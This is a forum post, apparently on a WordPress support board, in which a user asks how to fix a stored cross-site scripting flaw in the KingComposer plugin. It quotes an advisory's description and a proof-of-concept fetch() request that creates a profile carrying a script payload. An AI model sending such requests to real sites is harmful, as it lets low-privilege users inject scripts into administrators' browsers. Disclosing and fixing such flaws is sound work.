KingComposer <= 2.9.6 – Subscriber+ Stored Cross-Site Scripting
-
Hello,
Can anyone know how to fix this bug?
Description:
The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in themProof of Concept
Create profile:
fetch(“https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile”, {“headers”: {
“content-type”: “application/x-www-form-urlencoded”
},
“body”: new URLSearchParams({“name”:”y”, “slug”: “y”, “data”: btoa(“<script>alert(1);</script>”)}),
“method”: “POST”,
“credentials”: “include”
});
The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y`
Thank in advance
lalmeidaThe page I need help with: [log in to see the link]
- The topic ‘KingComposer <= 2.9.6 – Subscriber+ Stored Cross-Site Scripting’ is closed to new replies.
